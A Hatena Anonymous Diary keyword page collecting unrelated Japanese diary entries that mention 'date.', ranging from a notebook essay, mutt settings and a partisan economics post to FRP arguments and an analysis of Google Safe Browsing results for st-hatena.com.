「date.」を含む日記 RSS

はてなキーワード: date.とは

2021-02-11

大人はどんなノートを選ぶのか

四十半ばの超オッサンなのだが、学生の頃からB5サイズキャンパスノートを愛用している。

もう20年以上は使い続けており、使い勝手文句は無いし、価格も安いので重宝していた。今日キャンパスノートを小脇に挟んで打ち合わせをハシゴしたが、キャンパスノートはどの会議でもいつもと変わらぬ活躍をしてくれた。

だのに。家に帰り、いつもどおり机に置いたそのキャンパスノートが、今日に限ってみすぼらしい。

よく見ると、綴じた紙が30枚しかないので、薄くてペラペラしていて心もとない。表紙の厚紙は必要最低限の強度しかないので、テーブルの無い場所で筆記しようとすると、ふにゃふにゃして書きにくい。

机の上のキャンパスノートをめくってみると、表紙をめくると最初の1枚が微妙にくっついてくる事に改めて気が付き、何とも言えない腹立たしさを感じる。

この最初に現れる白いページにペンを走らせようとすると、ページの綴じの部分に格好の悪い折り目がついてしまう。だから1ページ目は使わず、2ページ目から使う事になる。なんでだ。

全頁の上にある「No.」と「Date.」欄も微妙だ。このスペースを使った事が無い。ここに何を書いてほしいのか。なぜこんなものにタテ幅で2センチ以上のスペースを使ってしまうのか。

さらに、罫線の引かれた本文欄と、このヘッダースペースの間にある謎の空間ちょっと意味がわからない。このスペースも使った事が無い。1.3センチほどあるがいったい何のためのスペースなのだ。なぜ全部罫線のスペースじゃ駄目なのか。

大人数の会議では、テーブルのスペースが全員に行き渡らないような状況にもかかわらず、偉い人のありがたい言葉メモに取らなければならない場面も多いのだけど、こんな時のキャンパスノート弱者しかない。

ソーシャルディスタンスへったくれもない会議室でふと周りを見渡すと、入社したばかりの若者がかっこいいA5サイズ位のオレンジ色ブロックメモを使っていたり、ハードカバーゴム紐で綴じたノートをつかっていたりして、膝の上でもスイスイメモを取っていてかっこいいのなんの。

その横で顔のくさそうな中年ヒラである私が、ふにゃふにゃした表紙のキャンパスノートを膝の上にのせ、必死メモを取っている。なんだかかっこ悪い。今期目標と書こうとしてペンが膝の稜線にそって滑り「今期| ̄ ̄ ̄ ̄ ̄」とかになってしまう。

ああ、なんだ、私。なぜだ、はずかしいぞ。

からあてがわれた洋服が恥ずかしくなった瞬間が皆にも有ったと思うが、その瞬間の気持ちを思い出してほしい。私は、まさに部会に出席をしている場でそれと似た羞恥を感じてしまった。

ペラペラキャンパスノートを使う自分が恥ずかしくなってしまった。

そんな日に限って、追い打ちが行われる。私が腿の上でメモを取りながら四苦八苦しているのを見た部署若者が、自分ノートを自慢してきたのだが、それは表紙がハードカバーになっているモレスキンというノートで、実にしっかりしていた。しかも、中を開くと上から下まで全てが罫線スペースになっていて無駄がない。しかも、なんかかっこいいんだよ。

若造モレスキンの話を始めたことで部署内でノート談義が始まったのだけど、私の同期まで話に加わってきて、アマゾンオリジナルハードカバーノートを自慢してくるのには驚いた。モレスキンクローンなんだけどね、使い勝手が良いし何より安いんだよね、なんて言って周りの関心をひいている。

そんな場で、あえてキャンパスを使い続けるいぶし銀みたいなポジションにされてしまい、なんとも歯がゆい

畜生、なんだよ、キャンパスノートじゃ駄目なのかよ。

悔しさもあって、帰宅Amazon Unlimited で文具系の本やムックダウンロードして読みあさりながら、ノートリサーチする。そして、意味もなくツバメノート測量野帳ポチったりしていたのだけど、読んでいたとある本に、キャンパスノート歴史が書いてある記事を見つけた。

それを読んでいると発売が1975年とあった。

私が生まれた年だ。なんだ、おまえ、タメか。

なんだよ、なんか愛着わいてきちゃったよ。

<<追記>>

B4→B5に直しました。ご指摘ありがとう

ブックマークコメントが凄く参考になる。紙にこだわるとか、そういう発想は無かったので新鮮。みんなありがとう

2021-01-11

anond:20210111172953

草生える

Four years after the Fukushima accident, TC screening data from the first and second round (up to December 2014) were compared with the Japanese nationwide annual TC incidence, and with the incidence in one area of Fukushima prefecture selected as reference (Tsuda et al., 2016). The authors reported that the observed number of TCs was substantially higher than the expected number based on national and regional incidence data, and concluded that this increase could be attributed to ionizing radiation exposure from the accident. This ecological study has been strongly criticized by scientists around the world because of serious methodology limitations; further, the study conclusions are not supported by the results (Davis, 2016, Jorgensen, 2016, Korblein, 2016, Shibata, 2016, Suzuki, 2016, Takahashi et al., 2016, Takamura, 2016, Wakeford et al., 2016). Limitations of ecological study design are well-known, although the authors did not acknowledge the issue of ecologic fallacy. Another criticism was that the data from the Fukushima screening program are not directly comparable with the cancer registry data from the rest of Japan where systematic advanced ultrasound technology is not used to detect cases. The authors of these criticisms suggested that though the increased TC number could be associated with the exposure from radioactive fallout, a more plausible conclusion would be that the screening program is finding an anticipated increase in TC detection across the Fukushima prefecture. Indeed, Tsuda and colleagues did not consider the latent properties of TC, nor the fact that a prevalent cancer detected by screening might have had first preclinical manifestations of abnormality before the nuclear accident.Thereafter, several researchers have analysed the relationship between radiation exposure (with different estimated exposure levels, mostly using an external dose) and TC prevalence and incidence in residents aged ≤18 years in the Fukushima prefecture at time of the disaster (Kato, 2019, Nakaya et al., 2018, Ohira et al., 2019a, Ohira et al., 2020, Ohira et al., 2019b, Ohira et al., 2016, Ohira et al., 2018, Suzuki et al., 2016, Toki et al., 2020, Yamamoto et al., 2019), but no radiation-related risks have been demonstrated to date.

https://www.sciencedirect.com/science/article/pii/S0160412020321851

ちなみにこの分野の雑誌にはあまり詳しくないけど、IF3.5で最高峰なの?

ちなみに自分引用した雑誌は7.9だった。

2020-08-21

アドレスエイリアス

エイリアスは nickname [longname] ・・・

nickname is ニックネーム. 一単語にしてね

ロングネームオプションです several wordsでもいいよ

メールアドレスはカッコでくるむ。以下省略 文字化けから

以下追加 to .muttrc:

set alias_file = "~/.mutt/aliases"

set sort_alias = alias

set reverse_alias = yes

source $alias_file

Explanation:
ニックネーム必須なのね。。。。

Now all you have to do when prompted To: is writing the alias instead of the full address. The beauty of it is that you can auto-complete the alias using Tab. Autocompleting a wrong or an empty string will display the full list. You can select the alias as usual, or by typing its index number.

There are two ways to create aliases:

From Mutt, press 「a」 when an e-mail of the target person を selected.

編集→ the alias_file 手作業で. The シンタックス is 本当に シンプル:

alias nickname Long Name <my-friend@domain.tld

会話のグループ

The default sort order is by date. Use the sort-mailbox command (default key: o) to change the sorting option. You can group e-mails by conversation/thread, in which case you can define how to sort threads and how to sort within a thread.

In the following example, threads are sorted according to the date of their last e-mail.

set sort=threads

set sort_aux=last-date-received

sort

Default: date

Specifies how to sort messages in the “index” menu. Valid values are:

date or date-sent

2019-06-22

れい新選組立憲民主党 どちらが正しいか (自民党とどちらが正しいか追記しました)

参議院議員選挙が近づき、れい新選組山本太郎議員がした減税のためなら安倍内閣とも組むとの発言が支持者の間で炎上する一方、立憲民主党経済政策を発表するなど、経済ニュースになった1週間でした。山本太郎議員は「2%を目指して物価を上げる」を公約にし、立憲民主党は「上げるべきは物価ではない、賃金だ」を公約にしています。どちらが正しいのでしょうか?

おまんじゅうが10,000個の経済があったします。1コ100円ならGDPは1,000,000円です。

これが翌年90円に値下がりしたとします。数量が同じであればGDPは900,000円です。物価全体が下がることを「デフレ」といいます

名目成長率」はマイナス10%ですが、これは物価10%下落したからで、それを差し引いて考えた「実質成長率」は0%で、名目成長率<実質成長率となりました。

ところでおまんじゅうの値段が下がれば、同じお金おまんじゅうが余分に買えるようになったのだから、とてもよいことのように思います。でも、来年物価が下がるとしたら、企業は人を雇うでしょうか。お金を金庫にしまっておけば同じお金でも来年価値があがって余分に物が買えるようになるのだから、人なんて雇いませんよね。借金して投資するなんてトンデモない。返済の負担が重くなるのですから投資が落ち込み、雇われる人が少なくなります。雇われる人が少なく、お給料の総額が減れば物を買う人が少なくなり、次の年はさらに消費も落ち込みますさらに物の値段が下がるのだからますますお金は使われなくなります。こうして物価の下落と経済の縮小がらせん階段を下っていくように進むありさまを「デフレスパイラル」といいます企業の「内部留保」が増えているのはデフレからです。

民主党政権時代物価はほぼ全期間下がり続け、名目成長率は常に実質成長率を下回っていました。だから民主党政権時代は、現金を持っている人、安定した職がある人は「物が安くなった」と幸せでも、不安定な職しかつけなかった人、これから職に就こうとする人にとっては最悪で-デフレになれば売上も下がります仕入れも下がります。ただ同じように下がらないものがあります。それは「借金」と「賃金」です。借金物価が下がっても減りませんし、正社員賃金には下方硬直性があります。それゆえデフレ化で企業にとって借金と並んで一番負担に感じられるのは賃金です。だからデフレになると新卒採用不安定就労層の雇用が一番打撃を受けるのです。-安月給で長時間労働を強いるブラック企業が全盛でした。

物価が上がればどうでしょうか?お金を持ったままだと来年価値が減ってしまますから、人を雇ってより儲けなければなりません。だから企業はより人を雇うようになります

デフレ放置した民主党政権下で雇用ヘロヘロだったのも、2014年に成長率の名実逆転を解消し(17年ぶり)、2017年需給ギャップを解消した(9年ぶり)安倍政権下で雇用が劇的に改善したのも、経済学的にはまったく理に適っています(なお、先日朝日新聞に"年収200万円未満が75% 非正規リアル政治は"という記事がありましたが、この記事アベノミクスによっても雇用に成果がでていないというのであれば明確に誤りです。また雇用環境改善したのは少子高齢化や団世代の大量退職のせいだという人がいますが、それも誤りです。この記事はその点を説明するためのものではないので、詳しくは論じませんが、失業率の分母は生産年齢人口ではなくて労働力人口で、労働力人口民主党政権化では増えておらず、安倍政権下では増え続けているとだけ指摘しておきます。)。

党首討論で、枝野議員は、「経済数字の最終成績はどこなのかと言ったら、やはり実質経済成長率2010年から12年の実質経済成長率は1.8%。2013年から18年は1.1%。これが客観的経済トータルの総合成績であることは、自信をもって申し上げたい。」と発言し、安倍首相に「実質成長の自慢をなされたが、名実逆転をしている実質成長の伸びは、デフレ自慢にしかならない。」と諭されていましたが、まさにそのとおりです。立憲民主党物価を上げずに賃金をあげて雇用も増やすとしていますが、それは卵を割らずにオムレツを作りますといってるのと同じです。

では、上がった方がいいとして、毎年10%も20%も上がるのがよろしくないのは当然として、なぜ2%なのでしょうか?

理由は3つです。まず、それが経済成長にとって最適というのが現時点のコンセンサスからであり、為替レートの安定のためであり、デフレに陥らないためです。

世界各国の中央銀行インフレ目標は2%です。

FRBは「年2%」が物価の安定と雇用の最大化という2つのマンデートを達成するには最適としています

"The FOMC noted in its statement that the Committee judges that inflation at the rate of 2 percent (as measured by the annual change in the price index for personal consumption expenditures, or PCE) is most consistent over the longer run with the Federal Reserve's statutory mandate."

https://www.federalreserve.gov/faqs/money_12848.htm

ECB欧州中央銀行)は中期的に「2%を超えない、但しそこに近いところ」を目指しています

"The primary objective of the ECB’s monetary policy is to maintain price stability. The ECB aims at inflation rates of below, but close to, 2% over the medium term."

https://www.ecb.europa.eu/mopo/html/index.en.html

イングランド銀行イギリス中央銀行)もすべての人の将来の計画を立てるのに資するとして「2%」をターゲットにしています

"To keep inflation low and stable, the Government sets us an inflation target of 2%. This helps everyone plan for the future."

https://www.bankofengland.co.uk/monetary-policy/inflation

オーストラリア準備銀行オーストラリア中央銀行)も「2~3%」のインフレ率を目指しています

"The Governor and the Treasurer have agreed that the appropriate target for monetary policy in Australia is to achieve an inflation rate of 2–3 per cent, on average, over time. This is a rate of inflation sufficiently low that it does not materially distort economic decisions in the community. "

https://www.rba.gov.au/inflation/inflation-target.html

世界の中銀が2%にしているのはそれが経済成長と物価の安定のためには最適というのがコンセンサスからですが(1つめ)、そのなかで日本けがそれより低い目標を掲げるということは、ちょっと物価が上がると他国に先駆けて引き締めますと事前にアナウンスしているのと同じことになりますから、事あるごとに円高が進んでしまます(2つめ)。

3つめの理由は、いったんデフレに落ち込むとなかなか抜け出せないからです。日本経営者アベノミクスデフレが解消しても内部留保を取り崩すことには慎重なままです。経営者マクロ経済学理解しているわけではないので、この20年間合理的だった経営=金をできるだけ使わない=が行動原理として染みついてしまっています。そして高齢化が進行し、低成長が常態になって、常にデフレ圧力がかかっている環境で、インフレ目標をたとえば1%などに設定して、低い物価上昇率をもって金融緩和を止めてしまうと、すぐにデフレに陥ってしまうのです。その失敗を日本2000年と2006年に経験済みで、最近だと昨年末ECBが同じミスを犯しました。

麻生財務大臣から財界幹部朝日新聞まで、ことあるごとに「2%なんて無理なんだからさっさとその目標放棄せよ」と提言していますが、彼らより山本議員の方が正確に経済理解しています

物価が上がった方がいいというのは、私たち生活で感じる直感とは異なります。私も物の値段は下がった方がうれしいです。但し、直感にしたがった行動が、悪い結果をもたらすことはしばしばあります法学経済学、社会学、それを知ることに学問価値があるのだと思います

追記

dc42jk 現在経済状況から金融緩和財政拡張政策の両方が必要だと思う。その両方を掲げているのはれいしかない。自民金融政策に触れてないし立民は金融引締めを示唆している。

まさに。賃金の上昇はどうしても物価の上昇に遅れますし、デフレ脳に染まった経営者を変えるのは簡単ではないので、デフレ脱却の過程ではどうしても、特に安定した雇用を得ていた層の実質賃金が低下します(新たに職を得た人が増えたので、総雇用所得は増えてはいますが)。それを補うために積極的財政支出が求められるのですが、1年目を除き高齢化に伴う社会保障費増以外の財政支出の拡大を渋ったのが安部政権の最大の問題点です。現在国債新規発行のたびに0.1%程度しかクーポンがつかないのにその4倍も5倍も札が入り(落札利回りはマイナス)、政府債務調達はただ同然、これはデフレ現象のものである民間部門の過剰貯蓄、特に企業ISバランスのI<S化と表裏一体です。ご指摘のとおり金融緩和とあわせて財政拡張をしない手はないのに、その両方を掲げているのは国債を財源に、奨学金をチャラにして、最低賃金1500円を政府補償し、公務員を増やし、公共事業積極的に行いますとしているれい新撰組だけです。

(ご参考)

日本財政政策選択肢オリヴィエブランシャール・田代毅(2019年5月

https://piie.com/system/files/documents/pb19-7japanese.pdf

「景気の回復が感じられないのはなぜかー長期停滞論争」ローレンス・サマーズ、ベン・バーナンキポール・クルーグマン、アルヴィン・ハンセン山形浩生翻訳)(2019年4月

https://www.amazon.co.jp/%E6%99%AF%E6%B0%97%E3%81%AE%E5%9B%9E%E5%BE%A9%E3%81%8C%E6%84%9F%E3%81%98%E3%82%89%E3%82%8C%E3%81%AA%E3%81%84%E3%81%AE%E3%81%AF%E3%81%AA%E3%81%9C%E3%81%8B%E3%83%BC%E9%95%B7%E6%9C%9F%E5%81%9C%E6%BB%9E%E8%AB%96%E4%BA%89-%E3%83%AD%E3%83%BC%E3%83%AC%E3%83%B3%E3%82%B9%E3%83%BB%E3%82%B5%E3%83%9E%E3%83%BC%E3%82%BA/dp/4790717313

"Macroeconomics"(12th Edition) " Robert J Gordon2013年

https://www.amazon.com/Macroeconomics-12th-Pearson-Economics-Hardcover/dp/0138014914

(未翻訳ですがアメリカ代表的マクロ経済学教科書です。IS-LM分析の箇所で日本に対する処方箋が取り上げられています。"combined monetary-fiscal policy expansion""The IS and LM curves shift rightward together"れいわの政策はそれに合致しています。)

追記2)

左派リベラルはほんとうに山本太郎に乗ってほしい。今まで何か提言する度に、財源はどうするんだ、そんなことして景気はだいじょうぶなのかと突っ込まれ、やれ法人税増税だ、富裕層増税だ、行政改革埋蔵金だと、見当外れなことを言うだけで(法人税は支払うのは企業ですが負担するのは庶民です。富裕層増税格差縮小の意味はあっても財源にはなりません。埋蔵金なんて結局みつからなかったし、公務員減らせば貧しくなるだけです)、結局有効提案を何ひとつできませんでした。何を言っても信用されないのはそのせいです。

そこに、自民党と異なる価値観を唱えながら、景気はむしろ良くします、財源はありますという政治家が現れました。しかブランシャールやサマーズ、ゴードンのような権威ある学者提案と軌を一にしている。これに乗らない手はないでしょ?

追記3)

立憲民主党は「アベノミクスによって事実上財政ファイナンス化した弛緩した金融政策について、市場と丁寧に対話しつつ、正常化を図っていく。」要するに、日銀による長期国債の買い入れ=量的緩和財政ファイナンスであり、やめますとしています。そのうえで消費税増税凍結を訴えています国債発行も減らして消費税増税分の2兆円もあきらめる、足りない分は金融所得法人税課税するというのだから、その二つの税金は大幅にアップするということになります金融所得に対する課税強化はリスクプレミアムを高めるので、日銀による買入れ縮小と同じく金融引き締め効果があります。すべての経済学の教科書に書いてあるとおり、法人税を支払うのは企業ですが、負担するのは庶民です。

彼らの政策を実現したらどうなるか。FRBが利下げを示唆し、ECB量的緩和への復帰を口にしているなか、日本だけ量的緩和をやめますリスクプレミアムを高めます金融は大幅に引き締めますというのだから円高が急速に進みます物価上昇率は下落し、またデフレに戻るでしょう。企業業績は悪化し、円高特に製造業が打撃を受け、そこに増税が追い打ちをかける。雇用シュリンクし、製造業海外移転拍車をかける特に地方高学歴でない層の雇用やこれから就職する人たちの雇用環境が大幅に悪くなります民主党政権のころの方が実質成長率が高かったから良かったと今でも主張する人たちなので当然なのかも知れませんが、彼らは要するに民主党政権当時に戻します、と言っています。同じく消費税増税に反対していても、デフレが最大の問題だとするれい新選組(「新撰組」じゃなくて「新選組」でした。ややこしいのは良くないと思いますが…)とは方向性がまったく違います

2018-11-19

VBSで先週の月曜~日曜の日付を出したい

今日実行したとしたら

「181112」「181118」という2つの値を取得したい。

this_day = Date.today

this_monday = this_day - (this_day.wday - 1) # 今週の月曜日

last_monday = (this_day - (this_day.wday - 1)) - 7 # 先週の月曜日

うーん。今週の月曜日の値を-1すりゃいいのか?

でも、値が「Wed, 05 Dec 2012」のように出るらしい。うーん。

2018-09-04

https://helpdesk.unity3d.co.jp/hc/ja/articles/115013063648-Unity-Editor-%E3%81%8C%E3%83%8F%E3%83%B3%E3%82%B0%E3%82%A2%E3%83%83%E3%83%97%E3%81%99%E3%82%8B%E5%95%8F%E9%A1%8C

数日内に解消される見込みですが、その間はオフラインモード(work offline)で作業していただくか、ネットワーク必要な方は以下の設定をPCに施すことで回避できます

  /etc/hosts (Mac/Linux場合) あるいは C:\Windows\System32\drivers\etc\hosts (Windows場合) に

  127.0.0.1 update.unity3d.com

  というエントリーを追加する

追記:2017 10.5 現在問題は解消されています上記回避は元に戻しても大丈夫です。

解消されてないやん。今日でもだめやん。やる気あんのか。

2017-11-06

重要かも】Google News RSSURL変更

この記事Googleの変更について書いています

RSSを使っている人のみ重要かも。

昨日、RSS受信ツールGoogleニュース

特定文字列検索した結果のRSSを見ると

以下の表示がありました。

---------------------------------------------

Google News RSS feed URL deprecation

This RSS feed URL is deprecated, please update. New URLs can be found in the footers at https://news.google.com/news

Google先生翻訳結果だと以下です。

GoogleニュースRSSフィードURL廃止予定

このRSSフィードURLは推奨されていません。更新してください。 新しいURLhttps://news.google.com/newsのフッターにあります

---------------------------------------------

しかGoogle ニュースの下部を見てもそんな情報

どこにも載っていません。

そこで更にググって以下の英文記事発見

Google News to deprecate old RSS feed URLs on December 1, 2017

https://searchengineland.com/google-news-deprecate-old-rss-feed-urls-december-1-2017-286149

---------------------------------------------

Google先生翻訳結果要旨】

Googleニュースは、2017年12月1日までに古いRSSフィードの購読URLを非推奨にする予定

・UTLを更新するには、news.google.comにアクセスして、必要なセクションを選択するか、カスタムセクションを作成する。

・セクションのページの下部にある[RSS]をクリックします。 これにより、フィードが表示されます

---------------------------------------------

どうも2017年12月1日までに対応必要らしい。

しかカスタムセクションを作っても下部に

[RSS]は表示されません。

もしかしてと思いGoogleニュース言語設定を

英語に変えてカスタムセクションに登録すると

セクションの下部に[RSS]が表示されました。

---------------------------------------------

ちなみ現在URL(非推奨)はこんな感じ

検索文字列は「android タブレット

https://news.google.com/news/feeds?hl=ja&ned=us&ie=UTF-8&oe=UTF-8&output=rss&q=android%20%E3%82%BF%E3%83%96%E3%83%AC%E3%83%83%E3%83%88

言語設定を英語にしてカスタムセクションつくって

[RSS]をクリックすると以下。

https://news.google.com/news/rss/headlines/section/q/android%20%E3%82%BF%E3%83%96%E3%83%AC%E3%83%83%E3%83%88/android%20%E3%82%BF%E3%83%96%E3%83%AC%E3%83%83%E3%83%88?ned=us&hl=en&gl=US

情報としては以上になります

---------------------------------------------

あとは強引な実験です。

あくま実験結果なので間違っている可能性もあります

URLを直接強引に言語日本語に変えても使えました

https://news.google.com/news/rss/headlines/section/q/android%20%E3%82%BF%E3%83%96%E3%83%AC%E3%83%83%E3%83%88/android%20%E3%82%BF%E3%83%96%E3%83%AC%E3%83%83%E3%83%88?ned=jp&hl=ja&gl=JP

さらURLを直接「android タブレット」を「ノートパソコン」に

強引に変えても動きました。

https://news.google.com/news/rss/headlines/section/q/%E3%83%8E%E3%83%BC%E3%83%88%E3%83%91%E3%82%BD%E3%82%B3%E3%83%B3/%E3%83%8E%E3%83%BC%E3%83%88%E3%83%91%E3%82%BD%E3%82%B3%E3%83%B3?ned=jp&hl=ja&gl=JP

どうも以下のような感じみたいです。

news.google.com/news/rss/headlines/section/q/(検索文字列)/(カテゴリー名)?ned=jp&hl=ja&gl=JP

これでいけるならイチイチ、カスタムセクション作らないで

いけるのでいいかなと思います

2016-05-16

http://anond.hatelabo.jp/20160516170508

まず、原理原則として「時間」ってのは、グローバルだ。これが一点。

次に、Date.nowはともかく、__hoge.tがグローバルである必要など何もないし、

なんでそう思い込んでるの?

お絵かきアプリコードがそうだったから?

あんな単純な、マウス座標を扱うときに、マウス座標の状態変数FRPストリーム)の階層グローバルなのは当たり前だけど、

なんか変な思い込みできちゃった?w

http://anond.hatelabo.jp/20160516170508

まず、原理原則として「時間」ってのは、グローバルだ。これが一点。

次に、Date.nowはともかく、__hoge.tがグローバルである必要など何もないし、

なんでそう思い込んでるの?

http://anond.hatelabo.jp/20160516170508

まず、原理原則として「時間」ってのは、グローバルだ。これが一点。

次に、Date.nowはともかく、__hoge.tがグローバルである必要など何もないし、

なんでそう思い込んでるの?

http://anond.hatelabo.jp/20160516170744

現在時刻のインデックス引数として」与える

=「プライベートで「最終更新時間」としては持つ。」

てことか?おまえ同一人物?住井と別人?

それはとにかく、ほんで?

過去の全データを蓄積するのならともかく、

アプリ現在時刻しか取り扱わないケースで、現在あるいは直近の状態を得るために

インデックス」作る意味って何?w

現在時刻を、Date.nowという、非インデックスAPIで取得して、

その非インデックスインデックス照合したい、とかそういうこと?w

http://anond.hatelabo.jp/20160516170242

からさあw、その「何らかの状態表現したオブジェクト」ってのが、すなわち

Date.now や __foo.tだ

って話なんだが、わかってきたかい?

わかってきたかい?というか、最初からわかってて、それをグローバル変数で持つの関数型的じゃないよね、という話をしていたのだけど

http://anond.hatelabo.jp/20160516165721

>それ以外ならカウントの代わりに何らかの状態表現したオブジェクトとかにすればいいでしょ?

からさあw、その「何らかの状態表現したオブジェクト」ってのが、すなわち

Date.now や __foo.tだ  

って話なんだが、わかってきたかい?

そういう話をしてるところに、

関数型では、インデックス指定されなければならない」とかいってる住井@東北大ぽいのが湧いてきたから、

おかしいのか?って返された、ってだけの話だけど、いかおまえらがアホなことほざいてたのかようやく理解してきた?w

http://anond.hatelabo.jp/20160516161429

正確には、

関数型って時間パラメータで与えて結果を得るんじゃないの」とか意味不明なこといってる馬鹿がいて、

hoge.t あるいは、date.now やらで指定してたインデックスというのは、関数型プログラミング文脈からインデックスが得られるんだとさ。

初期値0からはじまる時無限再帰カウントから、どうやって時刻を得るパラメータが得られるのか、頭のおかしい奴の考えるコード想像不能。

http://anond.hatelabo.jp/20160302090242

100%不可能机上の空論は聞き飽きたから、コードで示してみな?w

いったいどうやったら「現在時刻」を抽象化したdate.nowやらfoo.t以外で、

その「再帰無限なら現在時刻のインデックス引数として」「現在時刻のインデックス引数として」与えて、

現在時刻が得られる、お花畑みたいなコードが書けるんだよ?

馬鹿休み休みに言えよ、無能

http://anond.hatelabo.jp/20160516113354

再帰無限なら無限に得られるよね

グローバル変数の一部に代入しておくような手続き的な構造にする必要ないよね

関数パラメータのみから結果を生み出すっていう参照透過な形で実現できるよね

100%不可能机上の空論は聞き飽きたから、コードで示してみな?w

いったいどうやったら「現在時刻」を抽象化したdate.nowやらfoo.t以外で、

その「現在時刻のインデックス引数として」与えて、現在時刻が得られる、お花畑みたいなコードが書けるんだよ?

馬鹿休み休みに言えよ、無能

http://anond.hatelabo.jp/20160516154756

100%不可能机上の空論は聞き飽きたから、コードで示してみな?w

いったいどうやったら「現在時刻」を抽象化したdate.nowやらfoo.t以外で、

その「現在時刻のインデックス引数として」与えて、現在時刻が得られる、お花畑みたいなコードが書けるんだよ?

馬鹿休み休みに言えよ、無能

2014-11-07

st-hatena.comは危険だ!」→Google Safe Browsingの見方が間違ってるのでは?

http://anond.hatelabo.jp/20141106161928

はてブにも書いたのだけど、一応増田にもメモしておく。

st-hatena.com の結果は a.st-hatena.com の結果と一致する

http://www.google.com/safebrowsing/diagnostic?site=st-hatena.com

st-hatena.com の現在の状況

    現在のところ、このサイトは疑わしくないと認識されていますGoogle がこのサイト巡回したときの状況

    このサイト過去 90 日間に Googleテストした 2542 ページのうち 122 ページで、ユーザー同意なしに不正ソフトウェアダウンロードされ、インストールされていたことが判明しました。Google最後にこのサイト巡回したのは 2014-11-06 で、このサイトで不審なコンテンツ最後に検出されたのは 2014-11-06 です。

    不正ソフトウェアには 110 scripting exploit(s), 19 exploit(s), 6 trojan(s) などがあります感染先のコンピュータで平均 3 個のプロセスが新たに発生しています不正ソフトウェアは 40 個のドメイン(fn84.fr/, wkdjfgka.ddns.me.uk/, javaterm.com/ など)でホストされています。

    15 個のドメイン(muramoto.net/, meomore.com/, fn84.fr/ など)がこのサイト訪問ユーザー不正ソフトウェアを配布する媒体となっていたようです。

    このサイトは 29 個のネットワーク(AS9370 (SAKURA-B), AS701 (UUNET), AS209 (QWEST) など)でホストされていたことが判明しました。

不正ソフト感染を広げる媒介をしていたかどうか

    st-hatena.com は、過去 90 日間に 59 個のサイト(vip2ch.com/, blog.goo.ne.jp/nakazato-hitoshi/, netouyomilitary.com/ など)への感染媒体となっていた形跡がありますサイト不正ソフトウェアホストしていたかどうか

    いいえ、このサイトでは過去 90 日間に不正ソフトウェアホスティングは検出されていません。

これは、a.st-hatena.com のカウントと一致する。

http://www.google.com/safebrowsing/diagnostic?site=a.st-hatena.com

a.st-hatena.com の現在の状況

    現在のところ、このサイトは疑わしくないと認識されていますGoogle がこのサイト巡回したときの状況

    このサイト過去 90 日間に Googleテストした 247 ページのうち 122 ページで、ユーザー同意なしに不正ソフトウェアダウンロードされ、インストールされていたことが判明しました。Google最後にこのサイト巡回したのは 2014-11-06 で、このサイトで不審なコンテンツ最後に検出されたのは 2014-11-06 です。

    不正ソフトウェアには 110 scripting exploit(s), 19 exploit(s), 6 trojan(s) などがあります感染先のコンピュータで平均 3 個のプロセスが新たに発生しています不正ソフトウェアは 40 個のドメイン(fn84.fr/, wkdjfgka.ddns.me.uk/, javaterm.com/ など)でホストされています。

    15 個のドメイン(muramoto.net/, meomore.com/, fn84.fr/ など)がこのサイト訪問ユーザー不正ソフトウェアを配布する媒体となっていたようです。

    このサイトは 1 個のネットワーク(AS9370 (SAKURA-B) など)でホストされていたことが判明しました。

不正ソフト感染を広げる媒介をしていたかどうか

    過去 90 日間に a.st-hatena.com が他サイトへの感染媒体となっていた形跡はありません。

サイト不正ソフトウェアホストしていたかどうか

    いいえ、このサイトでは過去 90 日間に不正ソフトウェアホスティングは検出されていません。

a.st-hatena.com っていったい何?

a.st-hatena.com はリダイレクト用のドメイン

例えば http://a.st-hatena.com/go?http://anond.hatelabo.jp/アクセスすると http://anond.hatelabo.jp/ に飛ぶ。

はてなアンテナリンクするときにクッションページの役割を担ってる。

a.st-hatena.com は「危険サイト」なの?

なにかおかしいな、と思って goo.gl ドメインの結果も見てみたら似たような感じだった(後述)。

おそらくリダイレクト先が危険サイトだった場合リダイレクト元のドメインgoo.glとかbit.ly、t.coなど)もカウントされるような仕組みになっているんじゃないだろうか?

なんで a.st-hatena.com と st-hatena.com の結果はリンクしてるの?

たぶんGoogle Safe Browsingの仕様

a.st-hatena.com + b.st-hatena.com + d.st-hatena.com + f.st-hatena.com + ... とすべて足し合わせたものst-hatena.com の結果になるようだ。

まり危険なの? 安全なの?

特に危険はない。

はてなアンテナリンク先(はてな関係ないサイト)に危険サイトがいくつかある、というだけ。

結論

st-hatena.com は現状でウィルスを配信してはいないし被害を被ることもない。

・・・と断定していいだろう。

参考: goo.gl ドメインの結果

http://www.google.com/safebrowsing/diagnostic?site=goo.gl

goo.gl現在の状況

    現在のところ、このサイトは疑わしくないと認識されています過去 90 日間に、このサイトの一部で不審な動きが 1 回検出されていますGoogle がこのサイト巡回したときの状況

    このサイト過去 90 日間に Googleテストした 5488513 ページのうち 2753 ページで、ユーザー同意なしに不正ソフトウェアダウンロードされ、インストールされていたことが判明しました。Google最後にこのサイト巡回したのは 2014-11-06 で、このサイトで不審なコンテンツ最後に検出されたのは 2014-11-06 です。

    不正ソフトウェアには 1174 exploit(s), 708 trojan(s), 200 scripting exploit(s) などがあります感染先のコンピュータで平均 2 個のプロセスが新たに発生しています不正ソフトウェアは 594 個のドメイン(shop-corp24.com/, mt.co.kr/, jvvupdate.com/ など)でホストされています。

    157 個のドメインfeedburner.com/, finanstek.net/, padsdel.com/ など)がこのサイト訪問ユーザー不正ソフトウェアを配布する媒体となっていたようです。

    このサイトは 1 個のネットワーク(AS15169 (GOOGLE) など)でホストされていたことが判明しました。

不正ソフト感染を広げる媒介をしていたかどうか

    goo.gl は、過去 90 日間に 990 個のサイト(nudevista.tv/, vporn.com/, acervoamador.com/ など)への感染媒体となっていた形跡がありますサイト不正ソフトウェアホストしていたかどうか

    いいえ、このサイトでは過去 90 日間に不正ソフトウェアホスティングは検出されていません。

このサイト過去 90 日間に Googleテストした 5488513 ページのうち 2753 ページで、ユーザー同意なしに不正ソフトウェアダウンロードされ、インストールされていたことが判明しました。Google最後にこのサイト巡回したのは 2014-11-06 で、このサイトで不審なコンテンツ最後に検出されたのは 2014-11-06 です。

a.st-hatena.com の結果とよく似ている。

もしも「st-hatena.com がウィルスをばら撒いている」と考えた場合Googleもまた現在進行形ウィルスをばら撒いているということになる。

参考2:bit.ly と t.co

引用するのが面倒なのでリンクだけ。

どちらも似たような結果になっている。

http://www.google.com/safebrowsing/diagnostic?site=bit.ly

http://www.google.com/safebrowsing/diagnostic?site=t.co

編集履歴

11/7 16時くらい: 初版

11/7 16:35:見出しを使うように修正

11/7 17:25:タイトルを変更、説明を追加

2014-07-19

